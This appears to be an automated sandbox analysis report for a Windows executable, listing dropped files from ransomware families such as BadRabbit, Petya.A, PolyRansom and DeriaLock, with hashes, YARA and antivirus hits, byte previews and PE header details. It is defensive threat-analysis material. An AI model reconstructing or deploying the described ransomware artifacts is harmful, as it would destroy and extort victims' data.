                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gkQpVuanbaF9NlvvuXWgurY5DewGzPyzJHiTb1DbCSA:+9nWn+GgurYDeT7yzQtDOB
                                                                                                        MD5:0698DDACECA58DF19B729799BF1F5F3B
                                                                                                        SHA1:73E6499484810CA2BA8F6C789E23C91E71E98269
                                                                                                        SHA-256:FE225965551B3F123538EE8E13AC8BF8FC5B11A36937956F5158662F50AF9CF4
                                                                                                        SHA-512:0DA024CBC63B09E690545E7821E89DC0924B076491E5EC690655D626B593CFA0EE50B5641F4864CDEEFEB388F2756854AB2D624D3829CDD47BFB146A49C46971
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..K../Ny.0.RE>n..v..~...|r.....9b-.%..['...K..L..2... O)..y...y>\..pX......i.x..8..V......*...%...q/P..3..x1`y.B&32..A.Hv/?..].Fj... |._[.4........=."........P..Y...VB.<./..v........a.2W7......Q...;...;..?..S..B.4....C`;..}..q..9)..9,.v.......?J..BpM_..@H.D.A....&.../...i...`n..._(.gk..".^.Md.c...dN?.w.V{...1...4.b...1.m~...=..2.|6.2.'"v....1........d.j..=...6o...G.T.N..9....;.|...L5..G...........;t..j......>...+.....'..x..V.q..0PT>...JJgy.........vkN..CN@.Q....2...n^.1D..}.Yg.Y.Y..H_..al..&...2.p...$.....2!..\w....{...w..x....Zf....z.':U.].;t.^...v..."..n...}V..:..,W#?...#Nu.......f..Fh.Y+.[..R.....asz....7h)q.K._.:..\.?...\./....Qx.`G..Z.Y+.~.......b...G.3..to..{.6^.Fq.y.'E.H...d.}.|..X.R.3.vXeG...e...[8.....P.$h.....".d7E.... ..... .m...V<.a......Q$w...?.... _.<..eo..(p.i)...AQ.]/..V2..!S.Q...y%up.Q....W.#..i.a3[.\4.4H..;..a[....n?,...m...J.OR.q.........}...._...5/'.w.....>6r.B`.*,..\..p|<n..G}.x8..7.?JO>7.u.w:..c.....'.1.....l.........
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):288
                                                                                                        Entropy (8bit):7.2850878919396065
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6dQtBvisuZJ9DTPWvSm5oW48:AuiMrMhhtLsUswlP8SORJ
                                                                                                        MD5:5E2A32EA1F7FE7346A3BE9229262FF7C
                                                                                                        SHA1:22F876D775AB46FD4B7C5060121A2E16759EB167
                                                                                                        SHA-256:14E414988E25F8B49F8ABB34ED5EA8DC833B4CE0224160D17BCAFD19857C6992
                                                                                                        SHA-512:0B85FF56CEABBE5B37C02FD2005E8D2A5532B6A7F0333AF3E5FE94D9DD53CB44C7544A18229647E49384815E7E09204F39FAA80970F8430BEE64BB0411EA8286
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.....T....7(4.$Fw.='.q...R./.....f..".o...1....U.<.KJ.....K..1..DR.V..B..3.n.%.[=.......i.+S.7.}.Z..6..T6u..=.......K..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):7.5449424292370075
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:AuiMrMhhtGMz3j6lccB0jmybFEA+PxCX1q7NXn:LahRzT62cShbFEvW1q7tn
                                                                                                        MD5:E1BC4F7581F17635F7728F1BB161F215
                                                                                                        SHA1:0D8ADB6920FCFD34BB7C72CACC96129B31D540A3
                                                                                                        SHA-256:0FB8C2320E0C8302910E3125CFA7A78E4DA73C7A085F04408D2ECF433A283FC7
                                                                                                        SHA-512:0E4CF50EA39BECA432D189B23A7AD63929CFBD371EEB8309680930B3194763F73FC1C662ADA1DF1F5CC6AFD6EFCEDE610035178FF2ACDB986024F0A4F8A74E3A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@h...z..l..........cG....k.\z+s.9.r.G..e.tS.?.C.k..E.....Yd.......$s!..9.N.....@:G$.R.e..U.#u..v9....ln.....o.b..^........T...0.@.\...~...G.pD@|.3.Q....v......Ps.w#..#b..I(n^et.C...O..,.;>..xWK.2.{......J...6{.7"..O.....P...G..d3..?.....F.s.5...D..c2.4r(....=......h..C[..&......s....<...#3.$.....-.Q...B6.^.......k.....Q.?...ys..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):6.893327149057255
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:bmujdMB106RaUGtuxarLHagour7s9Kpt21DdfbGGxBLMnDQYZXfOwEG27dY+MAa5:y7BRaUG0xaCgour7OKpEBdTRAsYpmj9w
                                                                                                        MD5:5A4658C7EC3539DC9E8D262637D74AD1
                                                                                                        SHA1:2C8BED8B826C7980F4EDE6876A61869E1BEE0E17
                                                                                                        SHA-256:317CC4C673749E23C36D12E669DF0716C3A399DFA784613A7D352033CD07359F
                                                                                                        SHA-512:3A6CA4CE16C345898CE09F994B016E8FDA4EF0918FF22545B0F0C3CDB6AA182A829EB7ED445577AEF4BDAF90040EDC20BDEF2EB898BAA5B03CA18328736265AE
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL...<.....\..#.2....$.<^..'`.....#.?.m`i.wZ...UW".....c.M.\.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):7.649302351810127
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:AuiMrMhhtLtJY6DTkbS4O5gIIn4I0ieEGWeG6:LahtYYkbS4OjIpeEBeG6
                                                                                                        MD5:C0F700E56FB42D222BB5F78ABCFF935A
                                                                                                        SHA1:37F273D875908FABD9339E9EF9EC265BFB9C1B4E
                                                                                                        SHA-256:934274994290FC22256A2F24D2D5C8BCB2DBE27A52D5B771101990C62345ABE5
                                                                                                        SHA-512:986588707B690CBF0421628873BC404ADD3EA35F58D08F0CBCDA14A176A65ECD757748508638798B56CE07757BE0F1C86EC80168E9557384147B485EE0D3C7BA
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@.\.7.K.4d.wuFbi....*..@;.o..x.T....9q\#}.....6.z........vs.!yc2...Y.v.C&.%..<.S.jAc......P^....l..3..R.N.X?....wd...#kD.l+.........}."....2O.G..M....e......W..<`r>.5df.Wi.r...J..7c.D..... ......S..#.'.......9.)W..0K..W..c`K_...~........t...f3H\....u,d=./.Z..27!.(%..X..m...xEx.......)..o..J....H5...<.,3n.P.C...._`.F..q^3...z).6.H..bu
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):7.579816221244999
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:AuiMrMhhtHGc9J1ds0nXvsgUcZsWUF8fsEg7FZ:Lah71ds0nUgUcZsWHfU7r
                                                                                                        MD5:555FB7D927058E7FA5A588A84CD43F51
                                                                                                        SHA1:BE4B856C1BCCDD3175D2096127B582306BB75D09
                                                                                                        SHA-256:B20CCF1C189A072D9DAB6E4B96F43E256C14943E9B6A0E67CB3A319C203C77D9
                                                                                                        SHA-512:6212DF00BD8DEEF1CC866DD6444E0A1ACE9F284ABDD5632D6B0D060F96A13BB5838C42193B93534E66B4E643CFF1E03179103266C36B5832926D88FDE4A30290
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:K.\....`..5..:.X.i;1...t9....q.....$NkN...I...j....j..#(..|.{..^.."Jm..CG....E..kh.S...8.=....t....u."c.d.....R...#:.gL....v.f..Z.V.....$......,...9.@..Wt.D.D. ..sD......".....2l\...^....y.K`!1...-...q..$..yx.c..~....Kb...zMI.. }.2t......N.Vx..iRa..|........i5|..uc..3......J.V<..m........G..Mg. ..#.......6.(x.=+....hD..e$.1N.."g..........5..z........!.1....f.~P!.^U.h.<v.!s.iy....pOH.c.....Y..$=..-..|R...v.D......<.O...~..~&+..1..k)U.....38.Z..`z...(....c..\.Eg....d.......*.a@.<...!
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):182784
                                                                                                        Entropy (8bit):7.77136177821851
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:XvEBEUFurZ3Y1FzmzisYHH3Yangg9HSDGgN9biV+ADVHlocVf9QeOWFfhMiN:XvBECZ3Y1Fzmz3YnZGR21DBCeTfhM6
                                                                                                        MD5:2CB01F55AB958092E1595D2C55D6E6DA
                                                                                                        SHA1:6B8E8F0B4237D914213BCCACDC494C58261C10A9
                                                                                                        SHA-256:B91EA053E2C3316D878EBD0D4F4FF30616F0C12958D647FAC2AB82FEB50A5EAF
                                                                                                        SHA-512:EF757256B31192CCB892D821E7D513AD4826A9A5FF2FBF71CC55EE26A2F3A1838320782C30F7414BC53C480B38CEBD8E487161AB27EF8CD3EBC3753D7C9B7126
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......eU!.!4O.!4O.!4O.!4O. 4O.Rich!4O.................PE..L...{...............................q.............@..................................................................................................................................................................................................text............................... ...................................................Jd....h..C.h#.O..7w...&p...3........^..z.E...&.....|.....4sd...(.u..aa..j]....:Q..?.;...i..z....\2.#..Y...R.(._.s...-@.r/.c...G.E.....).I...6]..+.L...t.J..._.K.XzN.(...IY={.........K;..t.a..)....T....g....9.7=K....d.....y..J<MI..`x.G ...I...=..N...S....@J......$8......W...[o...{^_M..g.......C.N....8.....3...'#.[.c.Q.<V.n............m......b......S#.a.L........O....y..u.]..G.p.......o3@X.*....'.4....j8..<..g.`...9.j{H#.z..]..LX.K..+....k...(T....f.P..
                                                                                                        Process:C:\Users\user\yeYUggIg\rCUUIQEQ.exe
                                                                                                        File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4
                                                                                                        Entropy (8bit):2.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:pG:o
                                                                                                        MD5:6453C87468AE478A02D01480C75126B6
                                                                                                        SHA1:68CE859BCE61BFDF41FF50085FD2C07239B70DDE
                                                                                                        SHA-256:E9A3306E3843599EE3FCDFC0C66DB1F147306BC5EA8B852D0D0B9A1EEC828FB6
                                                                                                        SHA-512:6DBA8199D075DE07775CFEBD8306BE3B9F5E2CD9CE57E2F742BC0AE6F3DE90833B249F2DA9C7EAD424D9069B4505B0BA7E8FCAF9867D300EEB84E3261C1B4D12
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:x.5c
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):62328
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                                                        SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                                                        SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                                                        SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):210632
                                                                                                        Entropy (8bit):6.677691827536191
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                                                        MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                                                        SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                                                        SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                                                        SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):142848
                                                                                                        Entropy (8bit):6.314365095327337
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                                                        MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                                                        SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                                                        SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                                                        SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                                                        • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 96%
                                                                                                        • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):410760
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                                                        SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                                                        SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                                                        SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7
                                                                                                        Entropy (8bit):2.2359263506290326
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:t:t
                                                                                                        MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                        SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                        SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                        SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:Ok.....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe
                                                                                                        File Type:DOS executable (COM)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8192
                                                                                                        Entropy (8bit):6.62920299111979
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:eqW+3a6Gxl1PcD3KnL05am/g87dr1/H6DJD+BGgj7+qKuQQ4BCgR+dNBebG76qCn:++3a6mY49OD2JgH+q3QQ4B/W1TdSyg
                                                                                                        MD5:39AE324F116FF67A0863313C7DD192FD
                                                                                                        SHA1:F664A00D6B50969AE5E622695DDAFC614D0C3D55
                                                                                                        SHA-256:45A0C5D8DD289D08343BA0521E2E19249F66E38CDBB1467A3A320BA9040A6AD6
                                                                                                        SHA-512:08E4AC98C15E0AED47E0F4E89B77DE6E2CF169F6586C86B2AA5BB252D7EA1957D1DEA8F20AA22D3AB78C67BBEA76B98C800496AE9ABB53D08D33240FA920B4F4
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Reputation:unknown
                                                                                                        Preview:.=..U..F..N...N.u..F...]...S...F..f...F.....[]...U..SV.F...u..N..F.3....F.....8..^..V..F...........u.....f...F.....r.;V.w.r.;F.v.N3.^[]....U..S.F...u..N..F.3...F....3..E..^..V..F...........u.....f...f...r.;V.w.r.;F.v.+F..V.+F..V.......[]......$..Vhd..).[j.j.j.j6....P.F.P.......t..J.^......f+.f......f....f.... s.................f+.f......f....f.... s.j.j.j.j6....P.F.P.)......j.j.j.j7....P.N.Q......h......Pj...!.Q....R......j.j.j.j7....P.F.P......j.h....!.P....P.v..........^..h....[h...3.[......WV.v.j.j.j.j6....P.F.P.....j.h2.....P.v.V.7....j.j.j.j.....P.F.P.d.....F..f.F.....f.~..s..~.....7u.f.F....F..j.j.j.j8....P.F.P.&....f.F.....f.~.....s..~.....7f.F...j.j.j.j.....P.F.P......f.F.....f.~."sTj.j.f.v.....P.F.P......f.F.....f.~.....s..~.....7f.F...j.j.f.v.....P.F.P.....f.F..~......f.F.....f.~..s .^.....x..t.f.F...^....f.@.f.F.j.j.f.v...P.F.P.>....f.F.....f.~.....s..v.....7f.F...j.j.f.v...P.F.P......f.F.....f.~. slj.j.f.F.f.F.f- ...fP....P.F.P......f.F.....
                                                                                                        Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):282
                                                                                                        Entropy (8bit):4.885120575367098
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:PzLSLzMRfmWxHLThx0sW26NcwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpT0sKDAFSkIrxMVlmJHaVzvv
                                                                                                        MD5:3D76B6100402FB39286186736F21B2CF
                                                                                                        SHA1:3267DA48E71623AB8E342C06F4733FFD2FF5BEAD
                                                                                                        SHA-256:0455D41F72FC7E9C08BF80270E75B86BF879E10DB2407926A10E43F3BDD1233E
                                                                                                        SHA-512:33F800C96C7701D4983C9CDAD0F85C2D84EF4FBBB39D8F0B850586593101E9249097AAA5735CE9583A38C71A2500B9D875C2CFE2398BDD64218810FB18F3D949
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.934386889963872
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:4W5dQXszUV.exe
                                                                                                        File size:152064
                                                                                                        MD5:6ed3e3327246cc457d22bb92bd3bba8b
                                                                                                        SHA1:1329a6af26f16bb371782ff404d526eec1af9d22
                                                                                                        SHA256:72d4375c5fe2533acb5e378ddbd3c55f87c61003a492caffdcb40db988c49503
                                                                                                        SHA512:f6c5428adffc10294204e0b068510d91fced02bbe02158a21294ebd5baf249aff0264021cbf7b2b9b37533b1db4daa09113abaa84435f4aa7660849f9b9257f7
                                                                                                        SSDEEP:3072:gqMedjZ064qkGda5bFxs0ZUfBpfF6Mq6qUbHlVexC6exvLsBB16UVsh8iSd:+A0rAda5bFxvYptdHl4xV+Efuh
                                                                                                        TLSH:F0E3120AE1DC84A3D1F647BC42CF890E1FF210994B9FE2CEB554A5F45887362B5AA707
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..`.........."......H...........f... ........@.. ....................................`................................
                                                                                                        Icon Hash:00828e8e8686b000
                                                                                                        Entrypoint:0x4266fe
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x601F1A4D [Sat Feb 6 22:38:05 2021 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x266a40x57.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x566.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
